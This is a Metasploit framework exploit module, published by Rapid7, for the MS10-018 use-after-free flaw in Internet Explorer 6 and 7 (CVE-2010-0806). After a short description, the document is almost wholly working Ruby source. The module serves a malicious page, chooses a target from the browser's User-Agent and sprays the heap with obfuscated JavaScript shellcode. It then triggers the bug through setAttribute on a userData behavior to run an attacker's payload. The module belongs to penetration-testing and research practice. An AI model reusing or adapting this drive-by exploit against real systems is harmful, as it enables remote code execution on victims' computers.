MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free

2010-04-07T00:59:20
ID MSF:EXPLOIT/WINDOWS/BROWSER/MS10_018_IE_BEHAVIORS
Type metasploit
Reporter Rapid7
Modified 2019-05-23T12:01:21

Description

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, "The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object." NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

##
# originally ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
#  - Microsoft Internet Explorer 7, Windows Vista SP2
#  - Microsoft Internet Explorer 7, Windows XP SP3
#  - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  #
  # ms10_090_ie_css_clip is newer but *much* less reliable
  #
  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  #  :ua_name    => HttpClients::IE,
  #  :ua_minver  => "6.0",
  #  :ua_maxver  => "7.0",
  #  :javascript => true,
  #  :os_name => OperatingSystems::Match::WINDOWS,
  #  :vuln_test  => nil, # no way to test without just trying it
  #})

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free',
      'Description'    => %q{
          This module exploits a use-after-free vulnerability within the DHTML behaviors
        functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
        discovered being used in-the-wild and was previously known as the "iepeers"
        vulnerability. The name comes from Microsoft's suggested workaround to block
        access to the iepeers.dll file.

        According to Nico Waisman, "The bug itself is when trying to persist an object
        using the setAttribute, which end up calling VariantChangeTypeEx with both the
        source and the destination being the same variant. So if you send as a variant
        an IDISPATCH the algorithm will try to do a VariantClear of the destination before
        using it. This will end up on a call to PlainRelease which deref the reference
        and clean the object."

        NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'unknown',                         # original discovery
          'Trancer <mtrancer[at]gmail.com>', # metasploit module
          'Nanika',                          # HIT2010 IE7 reliable PoC
          'jduck'                            # minor cleanups
        ],
      'References'     =>
        [
          [ 'CVE', '2010-0806' ],
          [ 'OSVDB', '62810' ],
          [ 'BID', '38615' ],
          [ 'URL', 'https://web.archive.org/web/20100929225343/http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
          [ 'URL', 'https://web.archive.org/web/20120627174253/http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
          [ 'MSB', 'MS10-018' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
            {
              'Method' => 'automatic'
            }
          ],

          [ 'IE 6 SP0-SP2 (onclick)',
            {
              'Method' => 'onclick',
              'Ret' => 0x0C0C0C0C
            }
          ],

          # "A great celebration of HIT2010" - http://www.hitcon.org/
          [ 'IE 7.0 (marquee)',
            {
              'Method' => 'marquee',
              'Ret' => 0x0C0C0C0C
            }
          ],
        ],
      'DisclosureDate' => 'Mar 09 2010',
      'DefaultTarget'  => 0))
  end


  def auto_target(cli, request)
    mytarget = nil

    agent = request.headers['User-Agent']
    if agent =~ /Windows NT 6\.0/
      mytarget = targets[2]   # IE7 on Vista
    elsif agent =~ /MSIE 7\.0/
      mytarget = targets[2]   # IE7 on XP and 2003
    elsif agent =~ /MSIE 6\.0/
      mytarget = targets[1]   # IE6 on NT, 2000, XP and 2003
    else
      print_error("Unknown User-Agent #{agent}")
    end

    mytarget
  end


  def on_request_uri(cli, request)

    if target['Method'] == 'automatic'
      mytarget = auto_target(cli, request)
      if (not mytarget)
        send_not_found(cli)
        return
      end
    else
      mytarget = target
    end

    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending #{self.name} (target: #{mytarget.name})...")

    # Encode the shellcode
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))

    # Set the return\nops
    ret  	    = Rex::Text.to_unescape([mytarget.ret].pack('V'))

    # Randomize the javascript variable names
    j_counter	 = rand_text_alpha(rand(30) + 2)
    j_function2	 = rand_text_alpha(rand(100) + 1)
    j_object	    = rand_text_alpha(rand(100) + 1)
    j_id		    = rand_text_alpha(rand(100) + 1)

    heapspray = ::Rex::Exploitation::JSObfu.new %Q|
function heapspray(){
  var shellcode = unescape('#{shellcode}');
  var memory = new Array();
  var slackspace = 0x86000-(shellcode.length*2);
  var nops = unescape('#{ret}');
  while(nops.length<slackspace/2) { nops+=nops; }
  var fillblock = nops.substring(0,slackspace/2);
  delete nops;
  for(counter=0; counter<270; counter++) {
    memory[counter] = fillblock + fillblock + shellcode;
  }
}
    |
    heapspray.obfuscate(memory_sensitive: true)

    # Construct the final page
    case mytarget['Method']

    when 'onclick'
      html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
#{heapspray}
function #{j_function2}(){
#{heapspray.sym('heapspray')}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('#{j_id}').onclick();
</script></body></html>
|

    when 'marquee'
      j_attrib = rand_text_alpha(6);
      html = %Q|<html>
<head>
<style type="text/css">
.#{j_object} {behavior: url(#default#userData);}
</style>
</head>
<script>
#{heapspray}
function #{j_function2}() {
#{heapspray.sym('heapspray')}();
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
#{j_id}.setAttribute("#{j_attrib}",document.location);
}
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
}
</script>
<body onload="#{j_function2}();"></body>
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
</html>
|

    end

    # Transmit the compressed response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)

  end
end